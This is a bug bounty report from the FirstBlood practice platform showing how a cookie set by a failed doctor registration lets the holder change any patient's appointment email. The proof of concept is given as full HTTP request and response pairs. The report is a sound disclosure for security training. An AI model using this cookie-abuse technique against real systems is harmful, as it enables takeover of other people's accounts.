FirstBlood-#65 — DoctorAuthed cookie given at /register.php can be used to modify patient email at Appointment Form /manageappointment.php
This issue was discovered on FirstBlood v1
On 2021-05-09, 0xconft Level 5 reported:
Hi there,
When i test to register as doctor at /register.php endpoint with invalid data i got my cookie set to "doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9" where i can use this cookie to modify patient email at Appointment Form /manageappointment.php.
This bug can be chained with my previous report "aptid enumeration via http://firstbloodhackers.com:49276/api/qa.php can be used to leak Appointment data"
PoC of getting doctorAuthed cookie
Request
POST /register.php HTTP/1.1
Host: firstbloodhackers.com:49280
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://firstbloodhackers.com:49280
Connection: close
Referer: http://firstbloodhackers.com:49280/register.php
Upgrade-Insecure-Requests: 1
action=register&username=duh&inviteCode=1111111
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 18:58:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; expires=Sun, 09-May-2021 19:58:55 GMT; Max-Age=3600; path=/
Content-Length: 11014
-snip-
PoC of changing Sean Zseano's email address
Request
POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49280
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 136
Origin: http://firstbloodhackers.com:49280
Connection: close
Referer: http://firstbloodhackers.com:49280/manageappointment.php?success&aptid=15a49a94-8db6-4f64-875c-4de449d755ed
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9
message=Advised to rebook appointment as I missed my previous one&id=15a49a94-8db6-4f64-875c-4de449d755ed&[email protected]
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 18:52:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 7
success
And zseano email will be changed to [email protected] (screenshoot attached)
Best Regards,
0xconft
P2 High
Endpoint: /manageappointment.php
Parameter: email
Payload: [email protected]
FirstBlood ID: 7
Vulnerability Type: Application/Business Logic
The endpoint MA.php (to modify an appointment) only allows for certain values to be modified, however due to some application logic error, if the user has tried to signup as a doctor and has the cookie "doctorAuthed" set, then it allows them to modify the email address for any appointment.